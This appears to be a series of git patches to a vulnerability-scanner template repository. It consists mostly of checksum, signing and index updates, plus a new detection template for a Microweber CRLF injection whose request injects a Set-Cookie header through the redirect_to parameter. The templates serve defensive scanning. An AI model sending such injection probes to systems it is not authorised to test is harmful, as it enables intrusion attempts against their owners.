http/cves/2021/CVE-2021-29505.yaml:499c17d9f306975010f29ed644e4c232907941b4 http/cves/2021/CVE-2021-29622.yaml:79b2ae7f2667471da099f5594f532bbc00626580 -http/cves/2021/CVE-2021-29625.yaml:6b71626492d0e4d058f7c62d229a939065b84bad +http/cves/2021/CVE-2021-29625.yaml:2316f6210b7a01141b776e42c609483a01c95895 http/cves/2021/CVE-2021-3002.yaml:60618324e66630690c4b85faf6a5b38817601897 http/cves/2021/CVE-2021-30049.yaml:da78546d4d231f264cf840eedd0596d543ab9453 http/cves/2021/CVE-2021-30128.yaml:5d3c104ca678614f3c0b970fd3dab9975f35878c @@ -2504,7 +2504,7 @@ http/cves/2022/CVE-2022-1439.yaml:cbe0052e425f9e50c6b1c8f5485bf9324a314ff9 http/cves/2022/CVE-2022-1442.yaml:a52d96a918ba3035fe49f7fd40e49109c6071868 http/cves/2022/CVE-2022-1574.yaml:a5798fd0745aa94b4223ab067849053809d1218c http/cves/2022/CVE-2022-1580.yaml:0e94c20783866096e69931ba80caccbf03b74fdb -http/cves/2022/CVE-2022-1595.yaml:c64eac9bb84bf79b3d25cf6f2dacb4fce225c9f7 +http/cves/2022/CVE-2022-1595.yaml:e7b5ba17f21fcc3246fde369ab9c7b82b5f44934 http/cves/2022/CVE-2022-1597.yaml:0fd2522119f23d28516369b0f6e579ab802d032c http/cves/2022/CVE-2022-1598.yaml:9755cec2c1a4c02ba84abdc819c53082af2ab59e http/cves/2022/CVE-2022-1609.yaml:3997b6a9aec82ff2e552d1b8f53e34f0d61de38d @@ -3047,7 +3047,7 @@ http/cves/2023/CVE-2023-33338.yaml:64557689950914621e4b59c37bab423ac5ad636a http/cves/2023/CVE-2023-33405.yaml:fd578aece75fa256b7e9d6fbfd1d5beac0ac400c http/cves/2023/CVE-2023-33439.yaml:6833de5b8a09afccde10c5b536eef39c01a431f2 http/cves/2023/CVE-2023-33440.yaml:80e2c509f89e2ff0b83e6b8d548a3d4bf4eeb2e0 -http/cves/2023/CVE-2023-3345.yaml:f463a1c7cdd257be67891de77bb6ac818625db98 +http/cves/2023/CVE-2023-3345.yaml:a80c20db1df0f1413c0f14c1d90a40138b305dec http/cves/2023/CVE-2023-33510.yaml:a280edbd1c1acfede9382deb4138cb4494733edc http/cves/2023/CVE-2023-33568.yaml:1ad32800fd0219a8f89f6064e3fce39880d56f29 http/cves/2023/CVE-2023-33584.yaml:b4310ef83324d4f6e1e0d74751be0f3a82f927a3 @@ -3309,7 +3309,7 @@ http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c -http/cves/2024/CVE-2024-34470.yaml:b59fc0e9bbeff6177b5d37ddad097eebdc0e0ae4 +http/cves/2024/CVE-2024-34470.yaml:a5518a2ed26dd99303e2e20f7356eece7f2dc927 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b @@ -4194,7 +4194,7 @@ http/exposed-panels/openwrt/openwrt-luci-panel.yaml:23c9398019d54040ec5ec64239b8 http/exposed-panels/openwrt-login.yaml:99bc6770cd1dd9318d0575323ac32f92e4d8ff88 http/exposed-panels/openx-panel.yaml:1d6be9b221101c2f1fc724e0273450075e0c46e6 http/exposed-panels/opinio-panel.yaml:6f9232a1cd33bd4b348c6274cdd2436d7eb04405 -http/exposed-panels/oracle-business-control.yaml:1a40c6d9b1046d965a1e9fecd649423329de4de4 +http/exposed-panels/oracle-business-control.yaml:3db90a4292199b50c9375bb0e90a3de3942f9f46 http/exposed-panels/oracle-business-intelligence.yaml:7ae31ff5ddccb3f4a213467b032af88787cf2b49 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 http/exposed-panels/oracle-ebusiness-panel.yaml:6e0870f35289ffd8ffb69a3bf83b04ff116a95b0 @@ -8577,7 +8577,7 @@ profiles/osint.yml:683fe1e52716d054760d707dbc123f5e09de5418 profiles/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 profiles/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8 profiles/recommended.yml:fab406df5589469085f68aadf07cba513a2a20b8 -profiles/subdomain-takeovers.yml:d8f72d30ae890a9c7c63a6e43fc70e0595c312c2 +profiles/subdomain-takeovers.yml:71a2e501c22e3032df9efa362c8062716b725831 profiles/wordpress.yml:6f7a53edce77971ee3db3990eefbe92e23d7f8f8 ssl/c2/asyncrat-c2.yaml:6c9515a71fd5ffb28accde9bf1b379fdd366a2fa ssl/c2/bitrat-c2.yaml:bf09d13d92fcc31677491ae6aab2b73c833cff91 @@ -8608,7 +8608,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:eb95e252e41fe29c34a9560995a9af0f0aa37d01 +templates-checksum.txt:3be6ec98b6cd55d97b0e04c5176921d608a03034 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e4dfff8c616e3218f25c7c2de604e90124a07e0a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 05:16:24 +0000 Subject: [PATCH 509/847] Auto Generated cves.json [Fri May 31 05:16:24 UTC 2024] :robot: --- cves.json | 2 ++ cves.json-checksum.txt | 2 +- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 7fea183947..efb544a3c7 100644 --- a/cves.json +++ b/cves.json @@ -2381,6 +2381,7 @@ {"ID":"CVE-2024-2389","Info":{"Name":"Progress Kemp Flowmon - Command Injection","Severity":"critical","Description":"In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-2389.yaml"} {"ID":"CVE-2024-23917","Info":{"Name":"JetBrains TeamCity \u003e 2023.11.3 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23917.yaml"} {"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"} +{"ID":"CVE-2024-24919","Info":{"Name":"Check Point Quantum Gateway - Information Disclosure","Severity":"high","Description":"CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-24919.yaml"} {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"} @@ -2412,6 +2413,7 @@ {"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} +{"ID":"CVE-2024-34470","Info":{"Name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","Severity":"high","Description":"An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34470.yaml"} {"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index fdd7707641..f700702c1e 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -55d726c9b235a4147824c1f516d6ede1 +452c7c1312faac212368ec04f7467cdf From a0dc2071de2936e63f0828865b69e34cf4a5f5c4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 05:17:02 +0000 Subject: [PATCH 510/847] Auto Template Signing [Fri May 31 05:17:02 UTC 2024] :robot: --- http/cves/2022/CVE-2022-1595.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index ffc021a8e6..0ab0a80386 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -42,3 +42,4 @@ http: - "contains(header, 'wordpress_')" - "contains(header, 'Location')" condition: and +# digest: 490a0046304402204d27883fc498f5aa445d32855be69c081c8564e779ac28ab176d3a965879dbe3022054938b2fb1c14552e52c1e0b247e097fc18a802f48e48ac7cfcc7b05af268aa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 35ed440dd60ee85363b8b12ce6504493c0f38529 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 06:26:12 +0000 Subject: [PATCH 511/847] Auto Generated New Template Addition List [Fri May 31 06:26:12 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a35c11841a..814ab10113 100644 --- a/.new-additions +++ b/.new-additions @@ -45,6 +45,7 @@ http/misconfiguration/installer/ubersmith-installer.yaml http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml http/misconfiguration/installer/virtual-smartzone-installer.yaml http/misconfiguration/installer/wowonder-installer.yaml +http/technologies/gabia-server-detect.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 2ae5427765bc94a77cc579132e1d822d19d922e6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 06:26:19 +0000 Subject: [PATCH 512/847] Auto Generated Templates Checksum [Fri May 31 06:26:19 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 24618f3b47..f406b243d4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:6eee1186277f72ac4416ed2435f40e2541bea763 -cves.json-checksum.txt:3eb64dc359a3fa01d30c701a2ad27aea9bb3b8bc +cves.json:dd91b67f940e974898b092d7ec70b30823618862 +cves.json-checksum.txt:228ead1221696fbf9e065eae8380c2f221438495 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -2504,7 +2504,7 @@ http/cves/2022/CVE-2022-1439.yaml:cbe0052e425f9e50c6b1c8f5485bf9324a314ff9 http/cves/2022/CVE-2022-1442.yaml:a52d96a918ba3035fe49f7fd40e49109c6071868 http/cves/2022/CVE-2022-1574.yaml:a5798fd0745aa94b4223ab067849053809d1218c http/cves/2022/CVE-2022-1580.yaml:0e94c20783866096e69931ba80caccbf03b74fdb -http/cves/2022/CVE-2022-1595.yaml:e7b5ba17f21fcc3246fde369ab9c7b82b5f44934 +http/cves/2022/CVE-2022-1595.yaml:e62d387c391349d9a30991379aff1b17d5af912d http/cves/2022/CVE-2022-1597.yaml:0fd2522119f23d28516369b0f6e579ab802d032c http/cves/2022/CVE-2022-1598.yaml:9755cec2c1a4c02ba84abdc819c53082af2ab59e http/cves/2022/CVE-2022-1609.yaml:3997b6a9aec82ff2e552d1b8f53e34f0d61de38d @@ -6784,6 +6784,7 @@ http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a http/technologies/favicon-detect.yaml:88d64768349b41aa6efe98a6d64285ff73ba054e http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 +http/technologies/gabia-server-detect.yaml:b3f9672dec2b27086d25ec314cfa48d4e6f031b0 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 http/technologies/geth-server-detect.yaml:caf614fcafdfca5f044916adf9dde2abb41b46a9 http/technologies/getsimple-cms-detect.yaml:aa37fcd2cac2e03df123bddcf0cf441500318c41 @@ -8608,7 +8609,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3be6ec98b6cd55d97b0e04c5176921d608a03034 +templates-checksum.txt:3c6cc3a0faf81fef12e954fa33a42c3c2ef54b42 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 67ec019aeef7d8f8d55e12d9fd1a82bd01933bdd Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 31 May 2024 06:26:57 +0000 Subject: [PATCH 513/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3e468cfa82..2adbb5ff36 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -50,6 +50,7 @@ on: - 'http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml' - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' - 'http/misconfiguration/installer/wowonder-installer.yaml' + - 'http/technologies/gabia-server-detect.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' From 7f98daf143f0640475d71279f688a422ce4e9a61 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 06:28:02 +0000 Subject: [PATCH 514/847] Auto Template Signing [Fri May 31 06:28:02 UTC 2024] :robot: --- http/technologies/gabia-server-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/gabia-server-detect.yaml b/http/technologies/gabia-server-detect.yaml index e6249d5acf..07f9d814d4 100644 --- a/http/technologies/gabia-server-detect.yaml +++ b/http/technologies/gabia-server-detect.yaml @@ -33,3 +33,4 @@ http: part: header kval: - Server +# digest: 4a0a0047304502205ccf8e2d235f6cbcea261c0248b1337d4a7d4ac81edb302e970c5d290598cb0a022100c3883de05ee2d9ecf2578f402eff9e5e68ba731f3a05b8f71d4df2db48082369:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9075f2bebecc6a3037eaf92e4ab7307feaba31cd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 31 May 2024 13:21:41 +0530 Subject: [PATCH 515/847] fix FN --- http/exposed-panels/oracle-access-management.yaml | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/http/exposed-panels/oracle-access-management.yaml b/http/exposed-panels/oracle-access-management.yaml index eb34017120..44724ad052 100644 --- a/http/exposed-panels/oracle-access-management.yaml +++ b/http/exposed-panels/oracle-access-management.yaml @@ -10,16 +10,22 @@ info: classification: cpe: cpe:2.3:a:oracle:access_manager:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 shodan-query: http.title:"Oracle Access Management" + fofa-query: title="Oracle Access Management" vendor: oracle - verified: true tags: panel,oracle,login,detect http: - method: GET path: - "{{BaseURL}}/oam/pages/login.jsp" + - "{{BaseURL}}" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: @@ -27,13 +33,10 @@ http: part: body words: - "Login - Oracle Access Management" - - "/oam/server/auth_cred_submit" + - "/oam/pages/images" + - "/oam/server/" condition: or - - type: status - status: - - 200 - extractors: - type: regex part: body From 4ec97d75ccb96c1ef84ad79a4df70ad2dcad9fa8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 31 May 2024 08:19:42 +0000 Subject: [PATCH 516/847] Auto Generated New Template Addition List [Fri May 31 08:19:42 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 814ab10113..cbe2ef685c 100644 --- a/.new-additions +++ b/.new-additions @@ -16,6 +16,7 @@ http/exposed-panels/busybox-repository-browser.yaml http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/digital-watchdog-panel.yaml http/exposed-panels/fortinet/fortisiem-panel.yaml +http/exposed-panels/oracle-access-management.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/iot/netgear-boarddataww-rce.yaml From 58feab31a5911faf865b05b0f38de0f25067c3bc Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 31 May 2024 08:19:48 +0000 Subject: [PATCH 517/847] Auto Generated Templates Checksum [Fri May 31 08:19:48 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f406b243d4..6a73e6a5d5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4194,6 +4194,7 @@ http/exposed-panels/openwrt/openwrt-luci-panel.yaml:23c9398019d54040ec5ec64239b8 http/exposed-panels/openwrt-login.yaml:99bc6770cd1dd9318d0575323ac32f92e4d8ff88 http/exposed-panels/openx-panel.yaml:1d6be9b221101c2f1fc724e0273450075e0c46e6 http/exposed-panels/opinio-panel.yaml:6f9232a1cd33bd4b348c6274cdd2436d7eb04405 +http/exposed-panels/oracle-access-management.yaml:e15edb1391bc0c2b106f0f9ea60a307738e7db1d http/exposed-panels/oracle-business-control.yaml:3db90a4292199b50c9375bb0e90a3de3942f9f46 http/exposed-panels/oracle-business-intelligence.yaml:7ae31ff5ddccb3f4a213467b032af88787cf2b49 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 @@ -6784,7 +6785,7 @@ http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a http/technologies/favicon-detect.yaml:88d64768349b41aa6efe98a6d64285ff73ba054e http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 -http/technologies/gabia-server-detect.yaml:b3f9672dec2b27086d25ec314cfa48d4e6f031b0 +http/technologies/gabia-server-detect.yaml:194d560530bd2f19ab14523319f46dd7ef3757d8 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 http/technologies/geth-server-detect.yaml:caf614fcafdfca5f044916adf9dde2abb41b46a9 http/technologies/getsimple-cms-detect.yaml:aa37fcd2cac2e03df123bddcf0cf441500318c41 @@ -8609,7 +8610,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3c6cc3a0faf81fef12e954fa33a42c3c2ef54b42 +templates-checksum.txt:3cb8f160b0577067090d4a32939267a8fc3d7441 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a733fcb37a126f87b9e6ca4dc3e67638af545cd7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 31 May 2024 08:20:35 +0000 Subject: [PATCH 518/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 2adbb5ff36..5faa2150c9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -21,6 +21,7 @@ on: - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/digital-watchdog-panel.yaml' - 'http/exposed-panels/fortinet/fortisiem-panel.yaml' + - 'http/exposed-panels/oracle-access-management.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/iot/netgear-boarddataww-rce.yaml' From 24ceac824814532bac91bf358addf30fb0e67157 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 31 May 2024 08:21:34 +0000 Subject: [PATCH 519/847] Auto Template Signing [Fri May 31 08:21:34 UTC 2024] :robot: --- http/exposed-panels/oracle-access-management.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/oracle-access-management.yaml b/http/exposed-panels/oracle-access-management.yaml index 44724ad052..93c67194c6 100644 --- a/http/exposed-panels/oracle-access-management.yaml +++ b/http/exposed-panels/oracle-access-management.yaml @@ -43,3 +43,4 @@ http: group: 1 regex: - '(?i)Login\s+-\s+Oracle\s+Access\s+Management\s+([a-z0-9]+)' +# digest: 4b0a004830460221009b987e6950baed2c73f6a75be4134b254ee9bb5ff7f8603ee78871321ece224502210098f853289aa93ef588824ac480ad72a1019227b6acb2476c6ea638889ac64609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 92e23ba736622ee36fc6afda5fc8b540e5a84131 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 31 May 2024 14:01:21 +0530 Subject: [PATCH 520/847] Create CVE-2022-0666.yaml --- http/cves/2022/CVE-2022-0666.yaml | 36 +++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/cves/2022/CVE-2022-0666.yaml diff --git a/http/cves/2022/CVE-2022-0666.yaml b/http/cves/2022/CVE-2022-0666.yaml new file mode 100644 index 0000000000..9c53b2277a --- /dev/null +++ b/http/cves/2022/CVE-2022-0666.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-0666 + +info: + name: Microweber < 1.2.11 - CRLF Injection + author: ritikchaddha + severity: high + description: | + CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in Packagist microweber/microweber prior to 1.2.11. + reference: + - https://github.com/microweber/microweber/commit/f0e338f1b7dc5ec9d99231f4ed3fa6245a5eb128 + - https://huntr.dev/bounties/7215afc7-9133-4749-8e8e-0569317dbd55 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0666 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-0666 + cwe-id: CWE-93 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: microweber + product: microweber + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2023,huntr,crlf,microweber + +http: + - method: GET + path: + - "{{BaseURL}}/api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;" + + matchers: + - type: regex + part: header + regex: + - "^Set-Cookie: crlfinjection=1;" From b474e451614bf4a7d4e993d47483167862f9b44f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 31 May 2024 16:15:44 +0700 Subject: [PATCH 521/847] Rename http/misconfiguration/cubebackup-setup-installer.yaml to http/misconfiguration/installer/cubebackup-setup-installer.yaml --- .../{ => installer}/cubebackup-setup-installer.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/misconfiguration/{ => installer}/cubebackup-setup-installer.yaml (99%) diff --git a/http/misconfiguration/cubebackup-setup-installer.yaml b/http/misconfiguration/installer/cubebackup-setup-installer.yaml similarity index 99% rename from http/misconfiguration/cubebackup-setup-installer.yaml rename to http/misconfiguration/installer/cubebackup-setup-installer.yaml index 2850b0a3b4..2e0eae7090 100644 --- a/http/misconfiguration/cubebackup-setup-installer.yaml +++ b/http/misconfiguration/installer/cubebackup-setup-installer.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 